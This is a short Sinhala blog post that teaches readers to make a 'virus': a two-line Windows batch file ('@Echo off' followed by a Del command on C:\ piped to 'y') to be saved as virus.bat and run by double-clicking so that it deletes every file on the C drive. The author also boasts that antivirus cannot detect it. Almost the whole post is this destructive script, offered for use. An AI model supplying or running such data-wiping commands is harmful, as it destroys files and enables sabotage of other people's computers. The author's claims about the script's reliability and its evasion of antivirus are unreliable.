C drive එක තප්පරෙන් format කරන virus එකක් හදමු



මේක ගැන කිව්වොත් ,
       Virus එක පොඩි උනාට හරිම Dangerous එකක්..... මේක ඇවිල්ල..මිනිත්තුවක් යන්න ඉස්සෙල්ල හදාගන්න පුළුවන් උනාට C Drive එකේ තියෙන ඔක්කොම Files Delete කරනවා..... එලකිරි වගේ.................... 
      දැන් ඔයගොල්ලෝ හිතනවා ඇති මන් කොහොමද එළකිරි වගේ කිව්වේ කියල..... ඕක මන් අත්හදා බලන්න ගිහින් මගේ machine එකත් ෆොර්මැට් කරන්න උනා.....
මන් ඔයගොල්ලන්ටත් කියන්නේ 
මේක අත්හදා බැලුවට කමක් නැ Format කරන්න තියෙන Computer එකක හොදේ..........

දැන් අපි බලමු මේ Virus එක හදන හැටි....,,,,

තව පොඩ්ඩෙන් අමතක වෙනවා...... මේ Virus එක AntiVirus gard එකකකින් අල්ලන්න බැ හොදේ.......  
1. එස්සේල්ලම මේ පහල තියෙන Cods ටික Copy කරගෙන Notepad එකට Paste පාරක් දාගන්නකෝ..

                                           @Echo off
                                          Del C:\ *.* |y


2. ඊට පස්සේ ඕක save කරනකොට Name එක ව්දිහට virus.bat (ඕකේ Name එකට ඕන එකක් දෙන්න ඒත්.bat කියල අනිවාර්යෙන්ම දාන්න ඕනෙ හොදේ.....)

3. දැන් ඔයා save කරපු තැනට ආපු Icon එක Dobble Click කලාම,,,,,,, C Drive එකේ තියෙන
ඔක්කොම Files Delete වෙනවා......හරිය.......



හොදයි කියල හිතෙනවා නම් comment එකක් කොටලම යන්න හොදේ.........

0 අදහස්: